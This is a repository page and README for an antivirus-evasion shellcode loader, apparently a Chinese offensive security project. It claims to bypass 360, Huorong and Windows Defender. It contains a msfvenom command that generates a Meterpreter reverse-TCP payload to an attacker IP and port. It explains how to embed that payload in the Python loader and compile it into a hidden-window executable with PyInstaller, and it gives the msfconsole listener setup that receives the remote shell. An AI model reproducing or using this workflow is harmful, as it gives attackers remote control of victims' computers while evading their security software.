# Bypass_AV **Repository Path**: SecNN/Bypass_AV ## Basic Information - **Project Name**: Bypass_AV - **Description**: Bypass_AV msf免杀,ShellCode免杀加载器 ,免杀shellcode执行程序 ,360&火绒&Windows Defender - **Primary Language**: Unknown - **License**: Not specified - **Default Branch**: main - **Homepage**: None - **GVP Project**: No ## Statistics - **Stars**: 1 - **Forks**: 1 - **Created**: 2025-11-07 - **Last Updated**: 2025-11-14 ## Categories & Tags **Categories**: Uncategorized **Tags**: None ## README # Bypass_AV Bypass_AV msf免杀,ShellCode免杀加载器 ,免杀shellcode执行程序 ,360&火绒&Windows Defender 代码够简单,估计要不了多久就进特征库了,被杀了再去改几个特征码照样又可以免杀,保持更新。 ## 声明 #### 该项目仅供网络安全研究使用,禁止使用该项目进行违法操作,否则自行承担后果,请各位遵守《中华人民共和国网络安全法》!!! 代码未经过大量测试,如发现问题请提交 issue。 ## 环境 2022年5月8日 测试可以免杀国内杀软 火绒&360及Windows Defender Windows 10 64位 360&火绒&Windows Defender Windows 7 64位 或以上操作系统应该都没问题(没有测试) ## 使用msfvenom 生成ShellCode ``` msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.100 lport=8080 --encrypt base64 -f c ``` 注意:ShellCode 需要是64位的 ![image-20220508135022087](https://user-images.githubusercontent.com/34683107/167286509-b134001a-e463-495c-ab6b-78933050b14f.png) ## 加载器 将生成的ShellCode 填至 Bypass_AV.py 里的 ShellCode = '''**ShellCode**''' 处 注意:保留原始ShellCode 里的双引号 " 示例: ![image-20220508134821387](https://user-images.githubusercontent.com/34683107/167286553-0367af02-f64d-4e28-8b01-3080ae98c13f.png) 最终格式: ![image-20220508135655093](https://user-images.githubusercontent.com/34683107/167286556-9b847ebb-0408-43f6-836c-3ac7fac46788.png) ## 打包成可执行程序 编译 Python 3.8.6 pyinstaller 4.7 ``` pip install pyinstaller pyinstaller -F -w Bypss_AV.py ``` 生成Bypass_AV.exe在dist目录中 ## 运行监听 ``` msfconsole msf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set lhost 0.0.0.0 msf6 exploit(multi/handler) > set lport 8080 msf6 exploit(multi/handler) > run ``` ### Bypass_360 https://user-images.githubusercontent.com/34683107/167286823-a93fdd69-547e-4adc-9ae5-171fb0e919ca.mov ### Bypass_火绒 https://user-images.githubusercontent.com/34683107/167286897-a482c486-c3e9-4f69-ae55-98afd2ff1ed7.mov ### Bypass_Windows Defender https://user-images.githubusercontent.com/34683107/167286874-9413611e-c2be-4cfb-ba51-f95ebe5518af.mov 感谢阅读 ![Axx8](https://user-images.githubusercontent.com/34683107/167286522-4a5fb52c-f975-4ca1-ba6d-6333fd9ff046.jpg) ![微信公众号](https://user-images.githubusercontent.com/34683107/167347580-f2589264-3bc3-4e8a-9fd4-b5408a2b5dfb.png)